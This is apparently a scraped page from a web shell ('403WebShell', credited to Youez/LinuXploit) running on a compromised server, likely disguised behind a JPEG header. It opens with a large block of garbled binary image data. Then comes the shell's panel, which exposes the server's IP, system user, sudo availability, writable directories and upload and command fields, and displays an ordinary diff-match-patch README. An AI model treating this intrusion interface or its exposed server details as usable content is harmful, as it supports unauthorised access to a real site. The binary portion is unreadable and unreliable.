JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
403Webshell
Server IP : 45.32.152.128  /  Your IP : 216.73.216.91
Web Server : nginx/1.24.0
System : Linux stage-vultr 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : forge ( 1000)
PHP Version : 8.2.14
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/forge/spektrum.finance/node_modules/diff-match-patch/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/forge/spektrum.finance/node_modules/diff-match-patch/README.md
# diff-match-patch

npm package for https://github.com/google/diff-match-patch

[![Build Status](https://img.shields.io/travis/JackuB/diff-match-patch/master.svg)](https://travis-ci.org/JackuB/diff-match-patch)
[![Dependency Status](https://img.shields.io/david/JackuB/diff-match-patch.svg)](https://david-dm.org/JackuB/diff-match-patch)
[![NPM version](https://img.shields.io/npm/v/diff-match-patch.svg)](https://www.npmjs.com/package/diff-match-patch)
[![Known Vulnerabilities](https://snyk.io/test/github/JackuB/diff-match-patch/badge.svg)](https://snyk.io/test/github/JackuB/diff-match-patch) 

## Installation

    npm install diff-match-patch

## API

[Source](https://github.com/google/diff-match-patch/wiki/API)

### Initialization

The first step is to create a new `diff_match_patch` object. This object contains various properties which set the behaviour of the algorithms, as well as the following methods/functions:

### diff_main(text1, text2) → diffs

An array of differences is computed which describe the transformation of text1 into text2. Each difference is an array (JavaScript, Lua) or tuple (Python) or Diff object (C++, C#, Objective C, Java). The first element specifies if it is an insertion (1), a deletion (-1) or an equality (0). The second element specifies the affected text.

```diff_main("Good dog", "Bad dog") → [(-1, "Goo"), (1, "Ba"), (0, "d dog")]```

Despite the large number of optimisations used in this function, diff can take a while to compute. The `diff_match_patch.Diff_Timeout` property is available to set how many seconds any diff's exploration phase may take. The default value is 1.0. A value of 0 disables the timeout and lets diff run until completion. Should diff timeout, the return value will still be a valid difference, though probably non-optimal.

### diff_cleanupSemantic(diffs) → null

A diff of two unrelated texts can be filled with coincidental matches. For example, the diff of "mouse" and "sofas" is `[(-1, "m"), (1, "s"), (0, "o"), (-1, "u"), (1, "fa"), (0, "s"), (-1, "e")]`. While this is the optimum diff, it is difficult for humans to understand. Semantic cleanup rewrites the diff, expanding it into a more intelligible format. The above example would become: `[(-1, "mouse"), (1, "sofas")]`. If a diff is to be human-readable, it should be passed to `diff_cleanupSemantic`.

### diff_cleanupEfficiency(diffs) → null

This function is similar to `diff_cleanupSemantic`, except that instead of optimising a diff to be human-readable, it optimises the diff to be efficient for machine processing. The results of both cleanup types are often the same.

The efficiency cleanup is based on the observation that a diff made up of large numbers of small diffs edits may take longer to process (in downstream applications) or take more capacity to store or transmit than a smaller number of larger diffs. The `diff_match_patch.Diff_EditCost` property sets what the cost of handling a new edit is in terms of handling extra characters in an existing edit. The default value is 4, which means if expanding the length of a diff by three characters can eliminate one edit, then that optimisation will reduce the total costs.

### diff_levenshtein(diffs) → int

Given a diff, measure its Levenshtein distance in terms of the number of inserted, deleted or substituted characters. The minimum distance is 0 which means equality, the maximum distance is the length of the longer string.

### diff_prettyHtml(diffs) → html

Takes a diff array and returns a pretty HTML sequence. This function is mainly intended as an example from which to write ones own display functions.

### match_main(text, pattern, loc) → location

Given a text to search, a pattern to search for and an expected location in the text near which to find the pattern, return the location which matches closest. The function will search for the best match based on both the number of character errors between the pattern and the potential match, as well as the distance between the expected location and the potential match.

The following example is a classic dilemma. There are two potential matches, one is close to the expected location but contains a one character error, the other is far from the expected location but is exactly the pattern sought after: `match_main("abc12345678901234567890abbc", "abc", 26)` Which result is returned (0 or 24) is determined by the `diff_match_patch.Match_Distance` property. An exact letter match which is 'distance' characters away from the fuzzy location would score as a complete mismatch. For example, a distance of '0' requires the match be at the exact location specified, whereas a threshold of '1000' would require a perfect match to be within 800 characters of the expected location to be found using a 0.8 threshold (see below). The larger Match_Distance is, the slower match_main() may take to compute. This variable defaults to 1000.

Another property is `diff_match_patch.Match_Threshold` which determines the cut-off value for a valid match. If Match_Threshold is closer to 0, the requirements for accuracy increase. If Match_Threshold is closer to 1 then it is more likely that a match will be found. The larger Match_Threshold is, the slower match_main() may take to compute. This variable defaults to 0.5. If no match is found, the function returns -1.

### patch_make(text1, text2) → patches

### patch_make(diffs) → patches

### patch_make(text1, diffs) → patches

Given two texts, or an already computed list of differences, return an array of patch objects. The third form (text1, diffs) is preferred, use it if you happen to have that data available, otherwise this function will compute the missing pieces.

### patch_toText(patches) → text

Reduces an array of patch objects to a block of text which looks extremely similar to the standard GNU diff/patch format. This text may be stored or transmitted.

### patch_fromText(text) → patches

Parses a block of text (which was presumably created by the patch_toText function) and returns an array of patch objects.

### patch_apply(patches, text1) → [text2, results]

Applies a list of patches to text1. The first element of the return value is the newly patched text. The second element is an array of true/false values indicating which of the patches were successfully applied. [Note that this second element is not too useful since large patches may get broken up internally, resulting in a longer results list than the input with no way to figure out which patch succeeded or failed. A more informative API is in development.]

The previously mentioned Match_Distance and Match_Threshold properties are used to evaluate patch application on text which does not match exactly. In addition, the `diff_match_patch.Patch_DeleteThreshold` property determines how closely the text within a major (~64 character) delete needs to match the expected text. If Patch_DeleteThreshold is closer to 0, then the deleted text must match the expected text more closely. If Patch_DeleteThreshold is closer to 1, then the deleted text may contain anything. In most use cases Patch_DeleteThreshold should just be set to the same value as Match_Threshold.


## Usage
```javascript
import DiffMatchPatch from 'diff-match-patch';

const dmp = new DiffMatchPatch();
const diff = dmp.diff_main('dogs bark', 'cats bark');

// You can also use the following properties:
DiffMatchPatch.DIFF_DELETE = -1;
DiffMatchPatch.DIFF_INSERT = 1;
DiffMatchPatch.DIFF_EQUAL = 0;
```

## License

  http://www.apache.org/licenses/LICENSE-2.0

Youez - 2016 - github.com/yon3zu
LinuXploit